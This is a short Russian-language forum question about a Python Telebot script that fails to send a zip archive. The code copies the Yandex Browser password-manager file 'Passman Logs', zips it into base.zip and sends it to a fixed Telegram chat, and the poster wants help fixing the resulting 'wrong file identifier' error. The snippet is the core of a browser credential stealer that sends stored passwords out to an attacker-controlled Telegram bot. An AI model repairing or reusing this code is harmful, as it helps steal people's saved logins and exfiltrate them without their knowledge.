# Не отправляется архив python Telebot

Tags: python, telegram, telebot

````
os.remove('main.png')
    os.system(r'copy "C:\Users\User\AppData\Local\Yandex\YandexBrowser\UserData\Default\Passman Logs" > nul')
    os.system(r'rename "Passman Logs" "PassmanLogs" > nul')
    file = zipfile.ZipFile('base.zip', 'a')
    file.write('PassmanLogs')
    file.close()
    bot.send_document(CHAT_ID, 'base.zip')```
````

```
  raise ApiTelegramException(method_name, result, result_json)
telebot.apihelper.ApiTelegramException: A request to the Telegram API was unsuccessful. Error code: 400. Description: Bad Request: wrong file identifier/HTTP URL specified
```